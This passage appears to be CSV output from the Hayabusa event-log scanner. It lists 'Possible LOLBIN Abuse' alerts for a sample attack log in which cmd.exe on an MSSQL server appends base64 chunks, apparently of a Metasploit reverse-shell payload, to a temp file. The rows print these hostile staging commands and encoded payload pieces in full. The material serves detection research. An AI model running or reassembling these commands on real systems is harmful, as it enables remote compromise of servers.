QBRUFBSaLflQAD/HKG4kkGGg8S6hcB0K6HMTQQAiw3AAm8AixXEAkEAUKHwQkEAXItGqAtBAFJQUWiwakAA/9aDxG2h0AJBi4XAdBmLFeHJQQCN1/AXQQBQUFJoYORhAP+juAkUoWKvQQCFwHQeobACQQCLDagLQT5QsqCcQQBQUFFo7uRAAMbWkjwUtfaUAkEAzpACQQCuaqgLQQBSUKHwQzQAElA3>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x774 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:12.737 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo mbjjQADt1qH1AkEAJcQYg/gBdSWvoKQCqgBLoAICABMNqC5BAEBQofAXfABQUD3jaONA8f/WWcQYgz1gAkEAAHUlURWkAgAAoaD8QQCLie4LQQBSUKHwlUFxUFBRpBjjQM//C4PEGIsVnP2DAKGYAkEAiw2oC0EAUsKh8Nf9GFBQLrbA4kAA/7thRcjcHTDCQACDxBiF4PbEROiLtdoAAN0FGcJAANx1yKHwF5UANxWyC/gAg7oI3V3I2wVSAkGF+03I3A0g1t4A3bokUFBSfGjiLwD/1t8tkAJBAC/wF0FRg8QQ3E2t3RwkUFChDQtBAFBoCOJAAP/W94kCQQCDxI2FQZ9CN5FIL0hB9Z/4QpKQQfhBSEJLQ5v8/ZuZnyf4mZCYL0D1ky8nm0pJP0iQkpDW+P0vL0r4Qjf8QJJJ+EmYSvmSSfxJk0hCm58/k/mZQ5I3Q5NJQZhLS0BBN5g/1plB+Jg/SpJLS0v1N+mvaAAA1olVi4lV5IlV8GRV4IlVQYlVh4sVrAJBADPbg8n/iv//vX+F0omh0HxF2P////+JRdwPwoZN7gCL2dkLQQCDwhiJVfyLFaz1QQCJVfiLVfztUviJVciLVfw79fxtFa0xi1UgO8qLVfwevYtByIn90ItC/IsKi1IEOVXcT1XExg1/BTlNjnIGiU3YiVXci1X8QFJJOVX0iVXMyRZ8CItV8DuAyHcM01XIiVXwDn/MiVX0i1W5OQadf9iNBTk46HcGiU3oR1Xsi5hgA/qLVcxn2ovt4APRi038iVXgi1U7i0kEE9GLTfiJVeSLVfyDxSA5iU3J9V/QiVX8D+tO//8tgcH0AQAAagCDQQCk6AM1AFBR6CV/AACLTW/JRaqLRSCZPwX0AQCkaCQDAACD0QCJVdRRUOgD7G+PME30iUXYi0VNagAF9AEAAGjoAwCnIdGtiVXMUVDop34A9ItN7P5F8ItF6Gp2BfQBAABo6AMA14PRAIlV9FFQ6L9+AACBx2EBAABqMoPTAGjoAwASU1eJReiJA+zoon4AAItN5IvYIefgagAF9C0AABOWYwAAg9EiiVXMUVDogX4AAIlFL6FsAkEAhcKJVeRNjioBAADuFbAXQRyhqAtBAKJQaCzhQAD/1qGOF0EAqQ2oCyUAYFBQmFFo2OBJANvW3lX0i0Xwiz3wF0EAg8Qki0EUUlChrQJBAFeZUlBRU+gffgAAiw2oC0EAUotVtEKLRYBXUlBX55lopilAADyBoawCQQADTfCZi22LReiDxDDVwYtN7IlVxBtN9NeLz1NQofAXQQBTUosMWFfdUrvRfQA4i8pmVcQJi1XMSlLnrkVBiU386Lp9ZwCLTfgryKFF/BvCUGXwF0EA8Ytd2ItV0It91IsVK8r3VaUb11BSUVBQoagLQQBQaADO+QD/1i9N7ItVRS1Q7EEAiz2KF0EAg8QwUYtN4LNX+VJQi0XkUFHoXn0A7VKdVdxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1284 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:13.010 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo oagLQaxXeLRXV1BoyN9AAMXWkMQwaLjfQAD/1oPEBPCTW1flXWSQkJDci+yD7BR6qAJBAIveENBAAFNWO8FXsY3+ATMAi3UI6tuLBvReGTtviV7LiXMkCAAAiZ5aCAAAiSGFOgAAiV63dAhQ6DgUAADrJosNTFBBADhTUVbopxYAAIsWoVUXQVBSU4tIEI1+H2oDUVfoHxMAAEPDdA5QaDjoQAA7YEL//4PECIsXagFqCFLowVR4ADvDdA5QaCjofADoQmX/I4PECKFsAkECO8N0UVCLB2pAUOib6gAAO8l0FT2HEQEAdA5Q1qNUQADjFeX//4PqCIsNbAJBc+EXUWiAACEAUmBuVAAAO8N0FT2HEfQAdA5QaPzdQABv6OT//4PECOjhMAABNKAUQQCJFZcLQQCLF4mGMAgAAKH8C0EAAkE0CAAAiw38F0EAUVK+OUYAAIt0hdurhMgAKwCB+/F1yQAPbYUAogCB6rQjC/R00WMV+BdBAIsHjX/sx0XwAQAAAFFSiUX4zjsoAACLB1DoNy4AAIs9xAJBAKEC7ecAR4vIQIP5Cok9oAJBAJC4AkEAfoHuFQHArgBokNJAAIPCQIr/FYDBXd5TaJhcpwDoNOT/GYOjpVYfRggAAAAA6ET+//+DxARfXvKL5V3DuAGLVwDHYxQAALMAiUasixX4F0EAjU3siUXwiwdR6GbHRfkEAIl7xuR1/JRqJgBdX15bi+Vdw8dGIwIAAPaLN6gCQQBCSIkMqAJiAMRCW83/g8SZX6tbiwpdw4wRkJCQkJCgkJiQkJAdkFWL4L3sFFaLiwhXi30MhcB1IlKGFwgA0X/A/Bihl8tBAIXAD4SRAQAASI20AkEA6bMBAACDPbQCQVYBdQqLGGejjAVBAOski04Qg4wCJNk7yKUYiw24AkEqocACQQBBQIkNuAJBAKOtAkFFoawCQeKLDRDQGQCQhQ+NFwEAAIsVyAtBCov4wecFA/rpo6wCQQDZ2lYAAKOgC0EkiRWkC0EAiYZQCAAAixWkIkG4i4YwCITXiZZUCAAAIAeLUzQIhAAYeySLjji2ANuLhjAIAACEmy0IAAAryIuGPAgAABu0hcBpCnwEhclzBDNmM8CJNBCJRxSLjq8IAACLhjAIAACLwTQIAAAruItHVMgAJRtdhcB/Cg0Rhcn+BDPJ/sCJTxiJRxyLjkgiAEyLhkAIAACklkQIAAAryJuGTAgAIDrChcB/CnwZhclzBDMVM8CJTwhURwyLjhTQQACFyXQ3iz2sAkEAi8eZ6/mFOnUoixXIwNMAV//CQGhAlkCGUv8VOtdAAKH+wEAAg8BAUP8V4MFAAIPEEKH4F0EAZE4EAlXso0X0AQDU/1LgiU346L8lAOiLTgRR6MaIAAA2x0YIAAAAAOgJ/Ef/g8QEX16Lwl3DlYvsZ+ysAADHU4tdCFaNRRCLSwRXd2i0GEEAVcc2/BtlAADFuE5CqYvw>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa2c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:13.286 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo g/4LlYQEaQBdhv75NgpMD4T4BQAAgf7Z/Bz9D4TsBQAAgf5X/QoADwTgBQAAgVskOAoAD4TUNwBwgf6h/AprD4QPBQAAgf7uIwsAD828BQAAi03eM/879XVzgVl+EQEAdR2DFbQCQQBTQokVtAJBAOiRsf//g8QEv15biy5dwzv3dH/iPsgcQQChXAJBAEE7vokNyAJB/HRyi6S4AkEAU8gdPbgCQQDoIf3//JxYAkHhg8QEg/gBD4xQBQAAVo2G3v///2pUUlboiUkAAFChyMDkAAQM6UAeg/JAaKyvQABQWBW/wSYAg8QUX7Vbi+Vdw1ZoDEoTAOi64Cz/i/n8g8TkixtMKUGeixUUAkEAA/ET6Yk1kAJBAIkVlAJBHYtDDDvHdRQNTCwAvCdN/ImDSAgAAImTTAgAAIspDIuDmAhzjwPRTceJwQzjhbACMQD/syAIAAC4/9sAACvGx0XwBAAAADvBiUX0cgN/TWmLkyB0AACLyL4gGEEAjVPuIIvR0ekC86WLyotV9IPhAyvC86SLuyAIAACJRey4+ovzDLszCAAACUQZIAChWAJB/oP4AnwSjWUgUGjw6ECQ//BkwUAAg8QIi1I4wYdtjXMMaOgYQABW/9fhxAgwRfiFv9vqhQAAAGj230Dftf9ig+wIiTj4hcACRfACAHXcdWyLReyFwA+FBQQA8qH4F0EAi0u23asPx0XcYADmAFLZG03kplLLAAmLSwRN6FkWAADH1KACQQChuMgaAEKJHNACQQCL0EAk+gqjuAJBfH4NaLDSQADoatgl/4PEBFPod6P//4OdBDM66cgBAAChtAJBAIXAdS5o4OhAAFb/y4PECLrgE0EAhcB0F4pICIPACID5IH4MiM2KSGZCQIDaIJX0xgIAaNjoQOZWzsmL0IPECIXSdDaL+oPJ/zPA8q730W2D+fp2H4OrCWoDjUUIuFD/Fa7zQHiLPTjeFgCDJAzGcQsA6w+L785RQACLDdToyACJTaqKRQg8xk1YAkEOdB2LDdACZwBBg/ghiQ3QAkEAfCKNew1SaKx2vYHrQ7T4A3wSjUUIUGiQ6EAA/xVkwUAAg8QIi0P4A4MooQAAAQAAAMYBAKFoAkEAhcAPhIAAAABoaujsALT/14MACIXAdQ9oeOhAAFb/14PECIXAuVloaFFAAFb/14vkg8SIhf91FWhY6EAAVi8VOMFAAIv4FEsIhf90K8eDJPcAAAEAdAChYAJ4AIVZfA+NVxBSPhVswUAUg8QE6wIfwIX/iUOkdRGQg54FAAABAAAAx3EcAAAAAItFY4t1+ItV9ItN8CvGi3MQKw4rupKLIGEAAAPD/VQIIDzyiXMQ0Q2YdVcAi8YDyKGcAkEAg7xPiUO7UEEAM//ro4s3EAMTiXMQixWYAkEAoZwCQQAD0YkVmAJBABPHAFeMQQA5u4UIAIYPbdCNAACLQxCLSxw7Rw/qwgEAAKU+AkEAHIP4>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1340 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:13.560 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AaO0AogAdQuLSxCJDbUCQQBXQotTEGKMAkG2O9B0SIsNudpBAKHAAkEAQUCJDa/jQQAVwAJBAKEwAkEAi68Q0LEAO8EPjRMBcgCLDcgLWQCLucPmBQPxiyawAkEAQPujrERBmYkN+wKPN+i0KAAAiehiCAAAi4MwCAAAiZNUCAAA3QaLizQIAACJTgSjizgIAACbgzAIAABvZDQIAAAryIuDPAgAMxvCO8d/CnwEV89z0TPJM8CJDxDlRhSLi1AIAGNogzAIhACLkzRecQDq+otRKw/JRxvCO8eiCnwEO89Q+zPJ2cBfThiJqhyLtUgIAABug28IAACLk38NQQAryIuDTAg2ALfC5McYCnxBO89zBAbJM8+JTgiJRgyLDRTjQAA7z3Q3iw6sAkEFHEmZ9/nK0rYoixXIwEAAVoPC0wlA6EAAUv+fgMFAAEHIwEAAg8BAUP8VVOBRmYMvT4m7JAgAAIlhHIm7KG8AZom7IAgAAImMEGBXA+i/JwAAo6ALQQCJFaQL0bSJg2UIAACLDaQLQQCsYzwIAAB2FaALQZmJkzAIUQChpAtB1VOJgzTAAADoDG3//8/EBF9xW4vlXcOQkOiIArUAVto3ZMFAAIXAdSZo2OpAAKa06rMAgNZoaOpAAD3WaCC1wgD/1miAB0AA/9aDxBRew2gU6n0A/85oAOpAAM9E1EDsaMjpQADH1mh46UB+x9ZoyOlAALXW+BzpQAv/+4OGHF7ukLmQkJCQkJBVi++LRRyLDcgDQABWizWAQ0AAUOzBCGhk8g4AUZHWi4ySwC0AFz3y3IeDwkBS/5yhyMCJANYg8mwzg8BAUP/Wiw3IwEAAaOTxQCKDwUBR/9aLFciWQgBorPFAAIPC6VL/1qHIwEAAaLLxQACDwEBQ/zSLDQLAzABoIPFAAIPBQFH/1osKyJ5AiWi3mUCag8JAUv/WocLAQACDxESDwED9lAZAAFD/1osNyNZAtWjy8ECxg8FAUSjWixXIwEAA8yjwQACDwkBS/9ahyCpAu5js70AAg8BAUP/Wiw3IwEAAaLTvPwCDwUBR/9aLt8jAQABohO8DboPCgFL/1vnIwEB1aEhoQACDqUBQ/9ZoEIkAAIsN68BAq5TBQFHF1osVvbVJc4PEQIPCSWjQ7kAAUv/JocjAHwBoiO5AAIPAQFD/WYsNyMBAAF9A0UAAg8FAUf/Wi6vIwEAAaPA5QACDwv/x/9ahyO3xAMeo50AAosBAuP93iw1dwFoAaGDtQACfwUBRPtaLKsPAQAB+GO3FAIPCP1L/1gnIwBAAaGDtQACDwEBQ2dYfDcjhjACDxOCDwUBo4OxAAFGC1ov0yMBAwmjm6kAAg8JAZ//WocgmQK5ofMOiwoPAQFD/1osXyMBAAGhA7ECBZsFAUf/WixXIwEDgaPjr/gCDwhxS/9ahyMBA92iwUkAAg8BAUP/W2w2kwEAAp3DrQHODwVJR/9WLFcjA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8c4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:13.833 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QABo4OtAAO7CQFL/u6HIzkAAg8RAg8BAaPTqQGlQs9aDxAj0Fv8VcLTqAP6QkDSQ/otlUaFMQEEAU4tdCNRXU1DodBIACaNAQEHSi/uDyf8zwB2u2Xo0wRAA99FJg/kHD3DXAAAAagdo2PJAAO3/1oPEDIXAY4XCfwAAx8NEai+/YxV8wUAAg8QIiUUIhcCmhFIBAACL8KxpQEEAKPONVgFSUOiIBKwArc6L86DRi/jBnAKLpYvKg/kD86SLZQiLyCsMxgQx24sVTEBBAFIpjd38aPQXQbFQaAAYQQC/DiieVu/AD4X9AO0Aoc0YPniFwA+E8AAAl4tF/IXAD4UDAAAAZQ20QFcAYFHwERIAAKPkF0EAxgYAEjtbdWuLFQAYQZ0tamC/AFJo0PJAAFD/iw8AOYPEDKOcC0EA61aLDYPJ/zPA8q73kUmD+QgPhqv///9qCFTE8lQAU//Wg+8MhcAPFxd2/2r1DcjAQACYnPKFAIPBxVn/FYDBQACDxAhqAa/ccMFAAIsNvBgYAIkNnAtB6mah9BdBAGaFwHUcZscm9ElBAIoAX17HBYMLigC/AkEAM/2CLuVdw2Y9UAB05zM8ZovQoUxAQQBSaFvyHO5Q6MoNACqDxAyjrAtBADPUX3Eozu1dw+deuJkAZwBbJOUs3JCQkJCQkJAoB5CQ2ZB7MOyl7NhN9AChTEBBo1ZXi7gIUGj/DwAyagGTTQhXUeirTAAAi/Ag9nQtjTSIalNSVs55PwBBUKHIwDcAV4NPWmhg860AUP8VYcFAAIPEEIvGkl6LflbDi5sI8pUo////UWhwsXMAGuhDB50Ai/CF9tgujUWIamx8Vuj4PwAAiw3IwEAAN1eDwUBoNFJAZVH/K4DBQACDxBCLEF9ei+XYpYuFOf///1CjcPhaABoQXMHpAIMoBKMgOEEAtcBfI4sVyMBAgmgI80AAg8RAUv8VtcFAAHGy87gMACZBc16L5V3Diw1wAkEli1UIajeYYFJFO1AAAIvwhfbgLY1FiGp4UI3oqZoAAIsNyMBAAEeDbUDZ4PJAAFFvFa0iQACDxAyLxl9eauVdw4tVCGnov08AAF8zwF6LfV3ykJCQkJCQ8VWL7FaLdUVqaMcGACQAABP3XMFAAIvQg8QE/9J1CrhgAAAAkl3C0gANLxoAAAAzNov6sas9Qm2JAV9eXcIEAPxVSuyLADVTVleLPTDBQACNcMs5FAAAAIsGGvd0EIsIUIkO/9eLuoPEZ4XA7/CDxgRLdeSLVQjO/9eDxK0LXltdwgQAkJCkWJCQgpCQkJCQ9FWL7ItNCItFDIlBK13CCN66beyLRQiLQAz2wgQAkJA6VYvsi00Ii0UMiUFUXcIIAFWL7ItFCItAEDzCBACrkJBli+xRoNgCQQBWisj+wITJ8tgC6QAPhbAAAABo4AJBAOgL////hcB0DMYF2AKlNwBei+Vdw/EV4AJBAFJqcWoAaNwt>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x115c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:14.106 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QQDWYwVVAHXwhcotI6HgAkEAUOgVnP//i8bHBeACQQAAAEOyxgXYApgAAHCL5V3Diw3cAkEABYzzQABRJiwMAACCFdwCcQBS6I9ZLACFwHU5odwCQQCNTfxXaotR6NxXYACFWXW2iyH8oeCLQQD3UI8Ifv//iw3cAtMA2RU1AkELUVLoFf//hTPAXr7lXaWQkNaQMvhnzJC6kIpkkKDYAooAhIl0KP7IotgCQQB1H6HcAkEAUOjDAwAAxwWvAkEAAAAAAMcF4AKlAAAAAADDkGyQkJCQzJANUvuQkPFVi7OD7AyLRQxTjVeNUKeD4i470ItFCIlV+HMdnEAghcCRhEYCIQBqDP/qg8QEM8BfvFuL5V3eCACLuiyLThCL0RQr5b9PAhAD0V+JVhBei5Fbi3NdeQgAiwCLERSLWRAr+zvXdxmLQT6LOYk4iwH3eQSJeJXpcAbyAIt4GI2aFxAAAIHjAPD/EzvaiV0MD4LLAQAAovsAYQAAc87HkAwAIAAAIF0Mi9PB6gxNg/r/iVX8D4cdAQAAOzp7h4VJyACLRwyFwCnJs+hyVwAAi+X8i1yXFIsPjUQlFIWZ+A870bYLi1gEg8AEQoXbdDmLp4XbiV30dH9PG4Xb7AF1FTvRchGL0/yDeQRJzNJ1BNDJ2vGJD4td9ItHCFVLaQMViUcIi8iLR9I7yHYDiUf8i+wMd/90BlfopqH1rI1TGIlTEOmaogA6i0cUhUN0OYtHDBDAdAZQOhdXAACLXxQ6RxSF2zoSi038i1MIO0d2SIvDixuF23Xui38MutJ0BlfodFcYtYtzDFP/eFzBQCmDxASFNg+ExQAAPItV/I09GIlQCI0UGInhEFMAANIAAIlQFIvI6zSLE4kQi0Mri38IA8jtRwQ7yIlPinZciUcIi38Mhf90BlejB1cAII1LGIlLEMcDAEAAAIvLi1X4/0Ezx0EMub8AADHQifBPaFYEiVFYiQo9VQiJOolOBIlKLItOFIt+ayvPiz6BwQAQAACL14HhR/D//0nB+QyJTgyLWgw7y3P/ixI7Sihy+YvABIk5iw6LfgSJeQRySgSJTgRrMYmg+XJ7ll6W/OU6wj6ji+MI62oghQ7gB2oM/+6DxARfXjPAW4vlFsIIAHiQipCQkKyQVWzsuWoMU1ZXi30IeXc4M+j7XwAAi0cEM4GDxAQ7w4mJiQI8dA1Q6PQAAACkRwQ7w3XzjXdvVujUCQAAkt8cKh5QmF8U6Aa0AADvRzCLWjSJXxyJySSJRyyJSBCLeFzECDvIiUX084SpAACei1AE/BqLf5iL5otHDIXAdAZQhW10AACLB4tPBItXCInDCFDG/LITi038iUX4i0YIhcl0msvsdgaJHove6y+D+BRUGItMwxuF8okOdQg7RQh2A7ZFCIl06xTr/Is4J4kOiXcUO9ByBCt26wIz0ot1+IX2dbGLnwh0IAiJB1p/6oX/UwZX6GtVAACF>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x46c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:14.380 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 23QUizUwwUAAi8OLG1B8SYPERIXbdYqLRfSJABmTBF9eW4vlXSgEAJCQVYvsgxYMU4vkA1ZXVHM4q+jbCPtdEUMEg8QEhdPHBgAAAPbHqecArwAAdA1Q6M7///9xQw2qwHXzjUNZUOgZFIUAi1bjUehRCAAAi1SDNQiFwHSXi1AYpuh8+v8ni/CF9nQGVupnVAAAi0MMi0sIiQiLQww8TQB0gotTCIlCDIWudAZWsIdUAACLczCLezlXi0YQxxYAAAAA6JL6//87x+0IagBx6Of6Yf+LRwwz24XAdH4l6BdUSwAOVwSLbIlV+ItXCA07/IkGi+H4iUWti0YIhcl0CjvC3w2JHove6wWD+BRzGItMFxSFyYlSdQg7RRd2A4lF/Il0hxTrCItPFIm4iTgUO9ByBA7QcAIz0ot19Jn2HzCLU/yJpkSJB4tHDIXAdDJQ6BVU9wCF23QUizXMVEAA8cOLG1D/1oPEBIXbdfJX6Of5//87RYt1Fq3ou/lbbV9e+w7lXcIEhJCQbPSLEItFCMf7AAAAgYsHDIXAdQuLDaECQQCJTdSLwYtNEIXJdQqFwEsGi1AgiVUQU/9dFDxXhdt1A4tYGIsDvwEAxgA7x3JXi0MMhcB0BlDoHFMAALDFGIsLjUMYi9eF9nXmO9FzCxtwBINVBEKF9lDxizBtMXRTiz6F/4k4D4WKAAAxO9EPpoIAAAAMUPwa+QRJhYl1BIXVd/GJC+sTi0MUgnMUhcB0L4pDDIXegAZQFrtSAGGLxosRhfZ0DTl+CHMDNMaLNoX2dfOLOeiUwHQGUAgJUwAAaAAgmQD/FcvBQAC38IPEBIX2D4TZAAAAjUYYZoYAIAA+yAZeAFAAMn4IiVYQ70YU6zSLFokQizLki5zGA/iLQxyLz4kpt8LI/AOJQ1REQwyFwHQGUOivQAAAjU4YxwYAAABHiU4Qi34QixEAiTaJzgSNR0CJRzSJRgqJXxiLXQy6d7fdOywz9rVPIDveiQQEiXcQ7HcUifmZiXc8iXcciXckiXcoiR90YotTGFJOJ/jujjvGiUUQdAmxztotAACLdRBJSwSDwwRYVwg7zokKEAOJUQw1O47Gia4wdDRQ6CZSAOhNRQiJVV9eMwb5XcIQAItFEIXAdAdqDP/Qg8QEX164DJ4AAFtdwhAAf3cIiXe9+h8IJjhfXjPAW3LCEACQkJCQkJCQkJBoVYvsRuwgX1ZXi2QIjn3sM9uLRyxYRSKLIxCJTeCLUItKxkXwAJlVsIld9ItGEPdQGTvKdSqNVeCR6G4BAACDQQR1+P91GYtHIDvD6ztqhP/Qg8TJM8BfXluL5V3CDACLRRCLTQxQjTBNUVJoQFNAAOj7HgAAyvj/dRltRyA7w3SClzX/0FTEBF9eM8Bbi+VdwgwtAEUE2QAAi01Di1EQK8KJVdGDwAgk8QM8iUFDi0v0O2Ry0aAA8vFJfxiLRwyFcXQGUOinUAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:14.653 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 0FcEEg+JVWOLVwiJTQyLBotN/IniYotGCIXJdAo7wlQGiR6L3usvg/gUcwWL5JgUn8mJQYkIO0UMdkyJRaGJdIcU6wiLTxTIDol3FDvQcgQr0DZ3UNKL1viFBXWxi0UMnVcIiQeLfwyF/3QGV+iJUAAAhb50FIs1MNbYh90+ixt2/9b7xASF9jjyizQQi30IikXwhMB1C19ei8KOi+VdwgwAoU3oi0csxzUMAFoAFYtQXYlRBIkKiQGJSATvTyyLSBTwihCLMNoZ+sEAgQEAi9aB4fPw//9JwcYMiUgMi8kwO89zsYsdOxUMcl6LSASJMYsI4XAEiXEEi0oEifYEiQGJENRCBItFEI5eWz9VXcLuAJCQkJCQVULsg+yri1UTU1ZXi1oIoAL3egwrQzaJRfSNDFCD6yBzBbkgAAAAgHoQAIvBdfWLiRQrcBA7SXdxi0IEUDCJMXsIi3CoiXEEi0tYiUgEiQGJGIlDBMe4DE4AAMyJjCyLmOKLS5SLMyvBM84FAB0A4CUA8P//SMH4DDZDDF/VUXMhiwk7QQzk+YtDBIkwiwOLc1CJcASLQQSJQwSJ7IkTiVlti0cs6VoAAACLdxgrgRcQAAAlAPD//zvBiUX8D4K1AWAAPRcgAABzCoxF/AAgIgA3Rfzy+MHvDE+D//+JffgPh5oBFQA7OxuHK/oAAItGDIXAdAZQ6JVOAACDfBoUAIsajURgFIubTFX1OBA70XMJWsAEvoM4ZHTziVX4ixDf0olV8I6+nAAA8os6hRw5OHUWOU34chGLePyD6BtJhf91BIXJd7iJDotKCItGCAPBiUahixOLMMmnyJsDiUabi3YMhfZ0CRQulIQAwovs8I1CGMcCAAAAAIlCEIvJix4IikoQocl0CIsRFD/OFFoUxkIQAYtNgYtzENx4EIvZwekC8xexy4PhA/OkiUIIi0gwi/NfA87qiQqLQBRIW4lCBDPAi+W1w4uWDIXtdElW6FQaAAD3QYtOFIXJdD2LRvOFcHQJUOinTQAAi1UIV34UjUYUhf90EIsQ+DtPCHboi8eLP4X/dfCLdgyF9nQGVujtTUu0i31Ki0UqUDImXFtAAMPE6OHAdFmLt/y3UBiJUBDHPwAPAACNFAiJeAiJUBTpOSr//4uqKAiLRwiLTggDyEtGBDvIiU4IdgNtRgiLdgyF43QJVtP6TRkAi1UIjk8YxyB1JQAAiU8Qi8fGAP///+Beg8j/W4vlXcPBkN7lPUZV+3KLTd+LVQiNRRBQUVLofHHt/13DkJCQd5AokJCQkFWL7ItNCItFDIlBKF3CCACwi+wii3UIhSR0MH1GFIW9dAeLCIkgbusIaulW6D/0/wzsVQyLTZeJggSLVRSJSMvHUAyLThB3D8pGfWRdLhAAVYvsi1UIU1ZXhdJ0X4tCEIt1EIt9oo25EIXAdCA5eAR1BXxwCHSai8iLzYXAde7rDIsYiaOLShSJCIlR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd50 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:14.927 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FItCOI1KOIXAdIs5eOJ1BTmiCHRPi8iLAMzAdXYrXltdWwwdixeJMYtKPIkViUI8X15bXcIMAG6QkJCQkJBGkJDbkJB5i+yLNghWi3UQ7yl9DFa0UOhZ////V//Wg8ToX15d6wwAkJCQkJCQ2pCQkJB2K5BVi+JWi2UI9waFwPAUYZaJCItQBFL/UAiLBoPE8gnAdaZeXcOQkJCQig6QapCQsZAzpcPGkJCQkE6Qz5CQhpCQVYtKg+wIU4tdiFcz/4XbhoTYAAAAVosKiwZqAchsagBQEFpNANc9dZ8BAHQHx0YEAAAAAIt2CIX2dd2L84tGBIXAdJGLDr80AAAAaglR8H4E6KBMAFaLdgiF9ojghf90yLsbtwAAVlOJdfzoGxUAAIt1CDP/MX4EaXVuxhZqAWq0agCSJPdMAAA9dhEqAHUHxwFrAADrB8dilgAAAACLDAiF9nXQhf90Kot1/IX2fyN8R4H7wMYtAAmFVlDob6oAAGoAagJWF+hEXQD+i9iJT/wfnYtdCIuag366AnUKiwZqCVCyuEsAwOZ2CIX2demLIotGBIXAdPGLDmoAagCvAFHoekwAU4t2CJr2deReX8OL5V3DkJCQWpCQkJCQyZBoVRG2vYuldjNThfZ0KzeL/oN1/9Sui0VmGdFJi7J7V1Do6/Fqv4s0V+2L0cHpAvOlf8qD4XHzpF9eXcIIAJCskJuL7INsJFNWV1p9DDPbYdKF/3QjjXVNgzj/M8DyrvePSYP7pR8FiUyd3EOLf